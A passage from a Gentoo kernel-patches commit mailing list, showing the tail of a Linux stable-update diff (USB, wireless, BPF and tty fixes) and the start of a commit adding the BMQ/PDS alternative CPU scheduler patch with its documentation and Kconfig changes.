++ * struct dmub_rb_cmd_domain_control - Controls DOMAIN power gating
++ */
++struct dmub_rb_cmd_domain_control {
++	struct dmub_cmd_header header; /**< header */
++	struct dmub_rb_cmd_domain_control_data data; /**< payload */
++};
++
+ /**
+  * DPIA tunnel command parameters.
+  */
+@@ -3231,6 +3252,10 @@ union dmub_rb_cmd {
+ 	 * Definition of a DMUB_CMD__VBIOS_DIG1_TRANSMITTER_CONTROL command.
+ 	 */
+ 	struct dmub_rb_cmd_dig1_transmitter_control dig1_transmitter_control;
++	/**
++	 * Definition of a DMUB_CMD__VBIOS_DOMAIN_CONTROL command.
++	 */
++	struct dmub_rb_cmd_domain_control domain_control;
+ 	/**
+ 	 * Definition of a DMUB_CMD__PSR_SET_VERSION command.
+ 	 */
+diff --git a/drivers/net/wireless/realtek/rtw88/usb.c b/drivers/net/wireless/realtek/rtw88/usb.c
+index 4ef38279b64c9..2a8336b1847a5 100644
+--- a/drivers/net/wireless/realtek/rtw88/usb.c
++++ b/drivers/net/wireless/realtek/rtw88/usb.c
+@@ -271,6 +271,7 @@ static int rtw_usb_write_port(struct rtw_dev *rtwdev, u8 qsel, struct sk_buff *s
+ 		return -ENOMEM;
+ 
+ 	usb_fill_bulk_urb(urb, usbd, pipe, skb->data, skb->len, cb, context);
++	urb->transfer_flags |= URB_ZERO_PACKET;
+ 	ret = usb_submit_urb(urb, GFP_ATOMIC);
+ 
+ 	usb_free_urb(urb);
+@@ -413,24 +414,11 @@ static int rtw_usb_write_data_rsvd_page(struct rtw_dev *rtwdev, u8 *buf,
+ 					u32 size)
+ {
+ 	const struct rtw_chip_info *chip = rtwdev->chip;
+-	struct rtw_usb *rtwusb;
+ 	struct rtw_tx_pkt_info pkt_info = {0};
+-	u32 len, desclen;
+-
+-	rtwusb = rtw_get_usb_priv(rtwdev);
+ 
+ 	pkt_info.tx_pkt_size = size;
+ 	pkt_info.qsel = TX_DESC_QSEL_BEACON;
+-
+-	desclen = chip->tx_pkt_desc_sz;
+-	len = desclen + size;
+-	if (len % rtwusb->bulkout_size == 0) {
+-		len += RTW_USB_PACKET_OFFSET_SZ;
+-		pkt_info.offset = desclen + RTW_USB_PACKET_OFFSET_SZ;
+-		pkt_info.pkt_offset = 1;
+-	} else {
+-		pkt_info.offset = desclen;
+-	}
++	pkt_info.offset = chip->tx_pkt_desc_sz;
+ 
+ 	return rtw_usb_write_data(rtwdev, &pkt_info, buf);
+ }
+@@ -471,9 +459,9 @@ static int rtw_usb_tx_write(struct rtw_dev *rtwdev,
+ 	u8 *pkt_desc;
+ 	int ep;
+ 
++	pkt_info->qsel = rtw_usb_tx_queue_mapping_to_qsel(skb);
+ 	pkt_desc = skb_push(skb, chip->tx_pkt_desc_sz);
+ 	memset(pkt_desc, 0, chip->tx_pkt_desc_sz);
+-	pkt_info->qsel = rtw_usb_tx_queue_mapping_to_qsel(skb);
+ 	ep = qsel_to_ep(rtwusb, pkt_info->qsel);
+ 	rtw_tx_fill_tx_desc(pkt_info, skb);
+ 	rtw_tx_fill_txdesc_checksum(rtwdev, pkt_info, skb->data);
+diff --git a/drivers/tty/vt/vc_screen.c b/drivers/tty/vt/vc_screen.c
+index f566eb1839dc5..71e091f879f0e 100644
+--- a/drivers/tty/vt/vc_screen.c
++++ b/drivers/tty/vt/vc_screen.c
+@@ -403,10 +403,11 @@ vcs_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
+ 		unsigned int this_round, skip = 0;
+ 		int size;
+ 
+-		ret = -ENXIO;
+ 		vc = vcs_vc(inode, &viewed);
+-		if (!vc)
+-			goto unlock_out;
++		if (!vc) {
++			ret = -ENXIO;
++			break;
++		}
+ 
+ 		/* Check whether we are above size each round,
+ 		 * as copy_to_user at the end of this loop
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index 9eca403af2a85..97a0f8faea6e5 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -2389,9 +2389,8 @@ static int usb_enumerate_device_otg(struct usb_device *udev)
+  * usb_enumerate_device - Read device configs/intfs/otg (usbcore-internal)
+  * @udev: newly addressed device (in ADDRESS state)
+  *
+- * This is only called by usb_new_device() and usb_authorize_device()
+- * and FIXME -- all comments that apply to them apply here wrt to
+- * environment.
++ * This is only called by usb_new_device() -- all comments that apply there
++ * apply here wrt to environment.
+  *
+  * If the device is WUSB and not authorized, we don't attempt to read
+  * the string descriptors, as they will be errored out by the device
+diff --git a/drivers/usb/core/sysfs.c b/drivers/usb/core/sysfs.c
+index 8217032dfb85f..b63f78e48c74e 100644
+--- a/drivers/usb/core/sysfs.c
++++ b/drivers/usb/core/sysfs.c
+@@ -869,11 +869,7 @@ read_descriptors(struct file *filp, struct kobject *kobj,
+ 	size_t srclen, n;
+ 	int cfgno;
+ 	void *src;
+-	int retval;
+ 
+-	retval = usb_lock_device_interruptible(udev);
+-	if (retval < 0)
+-		return -EINTR;
+ 	/* The binary attribute begins with the device descriptor.
+ 	 * Following that are the raw descriptor entries for all the
+ 	 * configurations (config plus subsidiary descriptors).
+@@ -898,7 +894,6 @@ read_descriptors(struct file *filp, struct kobject *kobj,
+ 			off -= srclen;
+ 		}
+ 	}
+-	usb_unlock_device(udev);
+ 	return count - nleft;
+ }
+ 
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index 89c9ab2b19f85..a23ddbb819795 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -47,6 +47,7 @@
+ #define PCI_DEVICE_ID_INTEL_ADLS		0x7ae1
+ #define PCI_DEVICE_ID_INTEL_RPL			0xa70e
+ #define PCI_DEVICE_ID_INTEL_RPLS		0x7a61
++#define PCI_DEVICE_ID_INTEL_MTLM		0x7eb1
+ #define PCI_DEVICE_ID_INTEL_MTLP		0x7ec1
+ #define PCI_DEVICE_ID_INTEL_MTL			0x7e7e
+ #define PCI_DEVICE_ID_INTEL_TGL			0x9a15
+@@ -467,6 +468,9 @@ static const struct pci_device_id dwc3_pci_id_table[] = {
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_RPLS),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
++	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLM),
++	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
++
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLP),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
+diff --git a/drivers/usb/gadget/function/u_serial.c b/drivers/usb/gadget/function/u_serial.c
+index 840626e064e13..a0ca47fbff0fc 100644
+--- a/drivers/usb/gadget/function/u_serial.c
++++ b/drivers/usb/gadget/function/u_serial.c
+@@ -82,6 +82,9 @@
+ #define WRITE_BUF_SIZE		8192		/* TX only */
+ #define GS_CONSOLE_BUF_SIZE	8192
+ 
++/* Prevents race conditions while accessing gser->ioport */
++static DEFINE_SPINLOCK(serial_port_lock);
++
+ /* console info */
+ struct gs_console {
+ 	struct console		console;
+@@ -1375,8 +1378,10 @@ void gserial_disconnect(struct gserial *gser)
+ 	if (!port)
+ 		return;
+ 
++	spin_lock_irqsave(&serial_port_lock, flags);
++
+ 	/* tell the TTY glue not to do I/O here any more */
+-	spin_lock_irqsave(&port->port_lock, flags);
++	spin_lock(&port->port_lock);
+ 
+ 	gs_console_disconnect(port);
+ 
+@@ -1391,7 +1396,8 @@ void gserial_disconnect(struct gserial *gser)
+ 			tty_hangup(port->port.tty);
+ 	}
+ 	port->suspended = false;
+-	spin_unlock_irqrestore(&port->port_lock, flags);
++	spin_unlock(&port->port_lock);
++	spin_unlock_irqrestore(&serial_port_lock, flags);
+ 
+ 	/* disable endpoints, aborting down any active I/O */
+ 	usb_ep_disable(gser->out);
+@@ -1425,10 +1431,19 @@ EXPORT_SYMBOL_GPL(gserial_suspend);
+ 
+ void gserial_resume(struct gserial *gser)
+ {
+-	struct gs_port *port = gser->ioport;
++	struct gs_port *port;
+ 	unsigned long	flags;
+ 
+-	spin_lock_irqsave(&port->port_lock, flags);
++	spin_lock_irqsave(&serial_port_lock, flags);
++	port = gser->ioport;
++
++	if (!port) {
++		spin_unlock_irqrestore(&serial_port_lock, flags);
++		return;
++	}
++
++	spin_lock(&port->port_lock);
++	spin_unlock(&serial_port_lock);
+ 	port->suspended = false;
+ 	if (!port->start_delayed) {
+ 		spin_unlock_irqrestore(&port->port_lock, flags);
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index ee5ac4ef7e162..e6d8d9b35ad0e 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -402,6 +402,8 @@ static void option_instat_callback(struct urb *urb);
+ #define LONGCHEER_VENDOR_ID			0x1c9e
+ 
+ /* 4G Systems products */
++/* This one was sold as the VW and Skoda "Carstick LTE" */
++#define FOUR_G_SYSTEMS_PRODUCT_CARSTICK_LTE	0x7605
+ /* This is the 4G XS Stick W14 a.k.a. Mobilcom Debitel Surf-Stick *
+  * It seems to contain a Qualcomm QSC6240/6290 chipset            */
+ #define FOUR_G_SYSTEMS_PRODUCT_W14		0x9603
+@@ -1976,6 +1978,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(2) },
+ 	{ USB_DEVICE(AIRPLUS_VENDOR_ID, AIRPLUS_PRODUCT_MCD650) },
+ 	{ USB_DEVICE(TLAYTECH_VENDOR_ID, TLAYTECH_PRODUCT_TEU800) },
++	{ USB_DEVICE(LONGCHEER_VENDOR_ID, FOUR_G_SYSTEMS_PRODUCT_CARSTICK_LTE),
++	  .driver_info = RSVD(0) },
+ 	{ USB_DEVICE(LONGCHEER_VENDOR_ID, FOUR_G_SYSTEMS_PRODUCT_W14),
+ 	  .driver_info = NCTRL(0) | NCTRL(1) },
+ 	{ USB_DEVICE(LONGCHEER_VENDOR_ID, FOUR_G_SYSTEMS_PRODUCT_W100),
+diff --git a/drivers/usb/typec/pd.c b/drivers/usb/typec/pd.c
+index dc72005d68db9..b5ab26422c349 100644
+--- a/drivers/usb/typec/pd.c
++++ b/drivers/usb/typec/pd.c
+@@ -161,7 +161,6 @@ static struct device_type source_fixed_supply_type = {
+ 
+ static struct attribute *sink_fixed_supply_attrs[] = {
+ 	&dev_attr_dual_role_power.attr,
+-	&dev_attr_usb_suspend_supported.attr,
+ 	&dev_attr_unconstrained_power.attr,
+ 	&dev_attr_usb_communication_capable.attr,
+ 	&dev_attr_dual_role_data.attr,
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 43cc1fe58a2c6..a00a4b5476d45 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -5816,7 +5816,7 @@ static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 		neigh = __ipv6_neigh_lookup_noref_stub(dev, dst);
+ 	}
+ 
+-	if (!neigh)
++	if (!neigh || !(neigh->nud_state & NUD_VALID))
+ 		return BPF_FIB_LKUP_RET_NO_NEIGH;
+ 
+ 	return bpf_fib_set_fwd_params(params, neigh, dev, mtu);
+@@ -5931,7 +5931,7 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 	 * not needed here.
+ 	 */
+ 	neigh = __ipv6_neigh_lookup_noref_stub(dev, dst);
+-	if (!neigh)
++	if (!neigh || !(neigh->nud_state & NUD_VALID))
+ 		return BPF_FIB_LKUP_RET_NO_NEIGH;
+ 
+ 	return bpf_fib_set_fwd_params(params, neigh, dev, mtu);
+diff --git a/scripts/tags.sh b/scripts/tags.sh
+index e137cf15aae9d..0d045182c08c0 100755
+--- a/scripts/tags.sh
++++ b/scripts/tags.sh
+@@ -91,7 +91,7 @@ all_compiled_sources()
+ 	{
+ 		echo include/generated/autoconf.h
+ 		find $ignore -name "*.cmd" -exec \
+-			grep -Poh '(?(?=^source_.* \K).*|(?=^  \K\S).*(?= \\))' {} \+ |
++			sed -n -E 's/^source_.* (.*)/\1/p; s/^  (\S.*) \\/\1/p' {} \+ |
+ 		awk '!a[$0]++'
+ 	} | xargs realpath -esq $([ -z "$KBUILD_ABS_SRCTREE" ] && echo --relative-to=.) |
+ 	sort -u
+diff --git a/sound/pci/hda/hda_cs_dsp_ctl.c b/sound/pci/hda/hda_cs_dsp_ctl.c
+index 5433f6227ac9f..463ca06036bfe 100644
+--- a/sound/pci/hda/hda_cs_dsp_ctl.c
++++ b/sound/pci/hda/hda_cs_dsp_ctl.c
+@@ -218,10 +218,10 @@ int hda_cs_dsp_write_ctl(struct cs_dsp *dsp, const char *name, int type,
+ 	cs_ctl = cs_dsp_get_ctl(dsp, name, type, alg);
+ 	ret = cs_dsp_coeff_write_ctrl(cs_ctl, 0, buf, len);
+ 	mutex_unlock(&dsp->pwr_lock);
+-	if (ret)
++	if (ret < 0)
+ 		return ret;
+ 
+-	if (cs_ctl->flags & WMFW_CTL_FLAG_SYS)
++	if (ret == 0 || (cs_ctl->flags & WMFW_CTL_FLAG_SYS))
+ 		return 0;
+ 
+ 	ctl = cs_ctl->priv;


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-02-27 18:45 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-02-27 18:45 UTC (permalink / raw
  To: gentoo-commits

commit:     26c13af1abdb1a80f16f5de399d1029781be3e1d
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Feb 27 18:45:22 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Feb 27 18:45:22 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=26c13af1

Add BMQ Scheduler, USE=experimental

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                 |     8 +
 5020_BMQ-and-PDS-io-scheduler-v6.2-r0.patch | 10270 ++++++++++++++++++++++++++
 5021_BMQ-and-PDS-gentoo-defaults.patch      |    13 +
 3 files changed, 10291 insertions(+)

diff --git a/0000_README b/0000_README
index ae528a67..b0db3406 100644
--- a/0000_README
+++ b/0000_README
@@ -90,3 +90,11 @@ Desc:   Kernel module that provides a kernel filesystem for uid/gid shifting
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
+
+Patch:  5020_BMQ-and-PDS-io-scheduler-v6.2-r0.patch
+From:   https://github.com/Frogging-Family/linux-tkg https://gitlab.com/alfredchen/projectc
+Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.
+
+Patch:  5021_BMQ-and-PDS-gentoo-defaults.patch
+From:   https://gitweb.gentoo.org/proj/linux-patches.git/
+Desc:   Set defaults for BMQ. Add archs as people test, default to N

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.2-r0.patch b/5020_BMQ-and-PDS-io-scheduler-v6.2-r0.patch
new file mode 100644
index 00000000..fd815b76
--- /dev/null
+++ b/5020_BMQ-and-PDS-io-scheduler-v6.2-r0.patch
@@ -0,0 +1,10270 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 6cfa6e3996cf..1b6a407213da 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -5437,6 +5437,12 @@
+ 	sa1100ir	[NET]
+ 			See drivers/net/irda/sa1100_ir.c.
+ 
++	sched_timeslice=
++			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
++			Format: integer 2, 4
++			Default: 4
++			See Documentation/scheduler/sched-BMQ.txt
++
+ 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
+ 
+ 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
+diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
+index 46e3d62c0eea..fb4568c919d0 100644
+--- a/Documentation/admin-guide/sysctl/kernel.rst
++++ b/Documentation/admin-guide/sysctl/kernel.rst
+@@ -1597,3 +1597,13 @@ is 10 seconds.
+ 
+ The softlockup threshold is (``2 * watchdog_thresh``). Setting this
+ tunable to zero will disable lockup detection altogether.
++
++yield_type:
++===========
++
++BMQ/PDS CPU scheduler only. This determines what type of yield calls
++to sched_yield will perform.
++
++  0 - No yield.
++  1 - Deboost and requeue task. (default)
++  2 - Set run queue skip task.
+diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
+new file mode 100644
+index 000000000000..05c84eec0f31
+--- /dev/null
++++ b/Documentation/scheduler/sched-BMQ.txt
+@@ -0,0 +1,110 @@
++                         BitMap queue CPU Scheduler
++                         --------------------------
++
++CONTENT
++========
++
++ Background
++ Design
++   Overview
++   Task policy
++   Priority management
++   BitMap Queue
++   CPU Assignment and Migration
++
++
++Background
++==========
++
++BitMap Queue CPU scheduler, referred to as BMQ from here on, is an evolution
++of previous Priority and Deadline based Skiplist multiple queue scheduler(PDS),
++and inspired by Zircon scheduler. The goal of it is to keep the scheduler code
++simple, while efficiency and scalable for interactive tasks, such as desktop,
++movie playback and gaming etc.
++
++Design
++======
++
++Overview
++--------
++
++BMQ use per CPU run queue design, each CPU(logical) has it's own run queue,
++each CPU is responsible for scheduling the tasks that are putting into it's
++run queue.
++
++The run queue is a set of priority queues. Note that these queues are fifo
++queue for non-rt tasks or priority queue for rt tasks in data structure. See
++BitMap Queue below for details. BMQ is optimized for non-rt tasks in the fact
++that most applications are non-rt tasks. No matter the queue is fifo or
++priority, In each queue is an ordered list of runnable tasks awaiting execution
++and the data structures are the same. When it is time for a new task to run,
++the scheduler simply looks the lowest numbered queueue that contains a task,
++and runs the first task from the head of that queue. And per CPU idle task is
++also in the run queue, so the scheduler can always find a task to run on from
++its run queue.
++
++Each task will assigned the same timeslice(default 4ms) when it is picked to
++start running. Task will be reinserted at the end of the appropriate priority
++queue when it uses its whole timeslice. When the scheduler selects a new task
++from the priority queue it sets the CPU's preemption timer for the remainder of
++the previous timeslice. When that timer fires the scheduler will stop execution
++on that task, select another task and start over again.
++
++If a task blocks waiting for a shared resource then it's taken out of its
++priority queue and is placed in a wait queue for the shared resource. When it
++is unblocked it will be reinserted in the appropriate priority queue of an
++eligible CPU.
++
++Task policy
++-----------
++
++BMQ supports DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policy like the
++mainline CFS scheduler. But BMQ is heavy optimized for non-rt task, that's
++NORMAL/BATCH/IDLE policy tasks. Below is the implementation detail of each
++policy.
++
++DEADLINE
++	It is squashed as priority 0 FIFO task.
++
++FIFO/RR
++	All RT tasks share one single priority queue in BMQ run queue designed. The
++complexity of insert operation is O(n). BMQ is not designed for system runs
++with major rt policy tasks.
++
++NORMAL/BATCH/IDLE
++	BATCH and IDLE tasks are treated as the same policy. They compete CPU with
++NORMAL policy tasks, but they just don't boost. To control the priority of
++NORMAL/BATCH/IDLE tasks, simply use nice level.
++
++ISO
++	ISO policy is not supported in BMQ. Please use nice level -20 NORMAL policy
++task instead.
++
++Priority management
++-------------------
++
++RT tasks have priority from 0-99. For non-rt tasks, there are three different
++factors used to determine the effective priority of a task. The effective
++priority being what is used to determine which queue it will be in.
++
++The first factor is simply the task’s static priority. Which is assigned from
++task's nice level, within [-20, 19] in userland's point of view and [0, 39]
++internally.
++
++The second factor is the priority boost. This is a value bounded between
++[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] used to offset the base priority, it is
++modified by the following cases:
++
++*When a thread has used up its entire timeslice, always deboost its boost by
++increasing by one.
++*When a thread gives up cpu control(voluntary or non-voluntary) to reschedule,
++and its switch-in time(time after last switch and run) below the thredhold
++based on its priority boost, will boost its boost by decreasing by one buti is
++capped at 0 (won’t go negative).
++
++The intent in this system is to ensure that interactive threads are serviced
++quickly. These are usually the threads that interact directly with the user
++and cause user-perceivable latency. These threads usually do little work and
++spend most of their time blocked awaiting another user event. So they get the
++priority boost from unblocking while background threads that do most of the
++processing receive the priority penalty for using their entire timeslice.
+diff --git a/fs/proc/base.c b/fs/proc/base.c
+index 9e479d7d202b..2a8530021b23 100644
+--- a/fs/proc/base.c
++++ b/fs/proc/base.c
+@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
+ 		seq_puts(m, "0 0 0\n");
+ 	else
+ 		seq_printf(m, "%llu %llu %lu\n",
+-		   (unsigned long long)task->se.sum_exec_runtime,
++		   (unsigned long long)tsk_seruntime(task),
+ 		   (unsigned long long)task->sched_info.run_delay,
+ 		   task->sched_info.pcount);
+ 
+diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
+index 8874f681b056..59eb72bf7d5f 100644
+--- a/include/asm-generic/resource.h
++++ b/include/asm-generic/resource.h
+@@ -23,7 +23,7 @@
+ 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
+ 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
+-	[RLIMIT_NICE]		= { 0, 0 },				\
++	[RLIMIT_NICE]		= { 30, 30 },				\
+ 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
+ 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
+ }
+diff --git a/include/linux/sched.h b/include/linux/sched.h
+index 853d08f7562b..ad7e050d7455 100644
+--- a/include/linux/sched.h
++++ b/include/linux/sched.h
+@@ -762,8 +762,14 @@ struct task_struct {
+ 	unsigned int			ptrace;
+ 
+ #ifdef CONFIG_SMP
+-	int				on_cpu;
+ 	struct __call_single_node	wake_entry;
++#endif
++#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
++	int				on_cpu;
++#endif
++
++#ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 	unsigned int			wakee_flips;
+ 	unsigned long			wakee_flip_decay_ts;
+ 	struct task_struct		*last_wakee;
+@@ -777,6 +783,7 @@ struct task_struct {
+ 	 */
+ 	int				recent_used_cpu;
+ 	int				wake_cpu;
++#endif /* !CONFIG_SCHED_ALT */
+ #endif
+ 	int				on_rq;
+ 
+@@ -785,6 +792,20 @@ struct task_struct {
+ 	int				normal_prio;
+ 	unsigned int			rt_priority;
+ 
++#ifdef CONFIG_SCHED_ALT
++	u64				last_ran;
++	s64				time_slice;
++	int				sq_idx;
++	struct list_head		sq_node;
++#ifdef CONFIG_SCHED_BMQ
++	int				boost_prio;
++#endif /* CONFIG_SCHED_BMQ */
++#ifdef CONFIG_SCHED_PDS
++	u64				deadline;
++#endif /* CONFIG_SCHED_PDS */
++	/* sched_clock time spent running */
++	u64				sched_time;
++#else /* !CONFIG_SCHED_ALT */
+ 	struct sched_entity		se;
+ 	struct sched_rt_entity		rt;
+ 	struct sched_dl_entity		dl;
+@@ -795,6 +816,7 @@ struct task_struct {
+ 	unsigned long			core_cookie;
+ 	unsigned int			core_occupation;
+ #endif
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_CGROUP_SCHED
+ 	struct task_group		*sched_task_group;
+@@ -1539,6 +1561,15 @@ struct task_struct {
+ 	 */
+ };
+ 
++#ifdef CONFIG_SCHED_ALT
++#define tsk_seruntime(t)		((t)->sched_time)
++/* replace the uncertian rt_timeout with 0UL */
++#define tsk_rttimeout(t)		(0UL)
++#else /* CFS */
++#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
++#define tsk_rttimeout(t)	((t)->rt.timeout)
++#endif /* !CONFIG_SCHED_ALT */
++
+ static inline struct pid *task_pid(struct task_struct *task)
+ {
+ 	return task->thread_pid;
+diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
+index 7c83d4d5a971..fa30f98cb2be 100644
+--- a/include/linux/sched/deadline.h
++++ b/include/linux/sched/deadline.h
+@@ -1,5 +1,24 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+ 
++#ifdef CONFIG_SCHED_ALT
++
++static inline int dl_task(struct task_struct *p)
++{
++	return 0;
++}
++
++#ifdef CONFIG_SCHED_BMQ
++#define __tsk_deadline(p)	(0UL)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
++#endif
++
++#else
++
++#define __tsk_deadline(p)	((p)->dl.deadline)
++
+ /*
+  * SCHED_DEADLINE tasks has negative priorities, reflecting
+  * the fact that any of them has higher prio than RT and
+@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
+ {
+ 	return dl_prio(p->prio);
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ static inline bool dl_time_before(u64 a, u64 b)
+ {
+diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
+index ab83d85e1183..6af9ae681116 100644
+--- a/include/linux/sched/prio.h
++++ b/include/linux/sched/prio.h
+@@ -18,6 +18,32 @@
+ #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
+ #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
+ 
++#ifdef CONFIG_SCHED_ALT
++
++/* Undefine MAX_PRIO and DEFAULT_PRIO */
++#undef MAX_PRIO
++#undef DEFAULT_PRIO
++
++/* +/- priority levels from the base priority */
++#ifdef CONFIG_SCHED_BMQ
++#define MAX_PRIORITY_ADJ	(7)
++
++#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
++#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++#define MAX_PRIORITY_ADJ	(0)
++
++#define MIN_NORMAL_PRIO		(128)
++#define NORMAL_PRIO_NUM		(64)
++#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
++#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
++#endif
++
++#endif /* CONFIG_SCHED_ALT */
++
+ /*
+  * Convert user-nice values [ -20 ... 0 ... 19 ]
+  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
+diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
+index 994c25640e15..8c050a59ece1 100644
+--- a/include/linux/sched/rt.h
++++ b/include/linux/sched/rt.h
+@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
+ 
+ 	if (policy == SCHED_FIFO || policy == SCHED_RR)
+ 		return true;
++#ifndef CONFIG_SCHED_ALT
+ 	if (policy == SCHED_DEADLINE)
+ 		return true;
++#endif
+ 	return false;
+ }
+ 
+diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
+index 816df6cc444e..c8da08e18c91 100644
+--- a/include/linux/sched/topology.h
++++ b/include/linux/sched/topology.h
+@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
+ 
+ #endif	/* !CONFIG_SMP */
+ 
+-#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
++#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
++	!defined(CONFIG_SCHED_ALT)
+ extern void rebuild_sched_domains_energy(void);
+ #else
+ static inline void rebuild_sched_domains_energy(void)
+diff --git a/init/Kconfig b/init/Kconfig
+index 44e90b28a30f..af24591984ab 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -821,6 +821,7 @@ menu "Scheduler features"
+ config UCLAMP_TASK
+ 	bool "Enable utilization clamping for RT/FAIR tasks"
+ 	depends on CPU_FREQ_GOV_SCHEDUTIL
++	depends on !SCHED_ALT
+ 	help
+ 	  This feature enables the scheduler to track the clamped utilization
+ 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
+@@ -867,6 +868,35 @@ config UCLAMP_BUCKETS_COUNT
+ 
+ 	  If in doubt, use the default value.
+ 
++menuconfig SCHED_ALT
++	bool "Alternative CPU Schedulers"
++	default y
++	help
++	  This feature enable alternative CPU scheduler"
++
++if SCHED_ALT
++
++choice
++	prompt "Alternative CPU Scheduler"
++	default SCHED_BMQ
++
++config SCHED_BMQ
++	bool "BMQ CPU scheduler"
++	help
++	  The BitMap Queue CPU scheduler for excellent interactivity and
++	  responsiveness on the desktop and solid scalability on normal
++	  hardware and commodity servers.
++
++config SCHED_PDS
++	bool "PDS CPU scheduler"
++	help
++	  The Priority and Deadline based Skip list multiple queue CPU
++	  Scheduler.
++
++endchoice
++
++endif
++
+ endmenu
+ 
+ #
+@@ -924,6 +954,7 @@ config NUMA_BALANCING
+ 	depends on ARCH_SUPPORTS_NUMA_BALANCING
+ 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
+ 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
++	depends on !SCHED_ALT
+ 	help
+ 	  This option adds support for automatic NUMA aware memory/task placement.
+ 	  The mechanism is quite primitive and is based on migrating memory when
+@@ -1021,6 +1052,7 @@ config FAIR_GROUP_SCHED
+ 	depends on CGROUP_SCHED
+ 	default CGROUP_SCHED
+ 
++if !SCHED_ALT
+ config CFS_BANDWIDTH
+ 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
+ 	depends on FAIR_GROUP_SCHED
